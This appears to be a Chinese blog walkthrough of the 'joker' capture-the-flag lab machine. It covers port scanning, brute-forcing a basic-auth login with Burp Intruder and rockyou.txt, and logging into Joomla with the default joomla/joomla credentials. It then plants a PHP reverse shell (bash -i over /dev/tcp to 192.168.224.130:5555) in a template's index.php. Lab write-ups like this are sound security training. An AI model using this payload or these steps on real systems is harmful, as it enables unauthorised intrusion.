joker靶机

已于 2025-03-19 00:20:01 修改
阅读量217 收藏
点赞数 1
文章标签: linux
于 2025-03-19 00:19:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_64470109/article/details/146356434
版权

先设置为NAT模式

主机发现

Masscan快速扫描端口

服务扫描

访问8080端口,需要用户名和密码来登录

抓包,发现是base64加密,类似于tomcat的用户名和密码格式

放到intruder模块,爆破

第二个字典选择kali 里面/usr/share/wordlists/rockyou.txt 这是一个具有14万的字典

爆破得到用户名和密码

登录进来

发现是joomla搭建的,直接登后台,默认用户名和密码,joomla,joomla

进来找到index.php

写入反弹shell

<?php

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.224.130/5555 0>&1'");

?>

点击TemplatePreview预览index.php

端口监听,成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值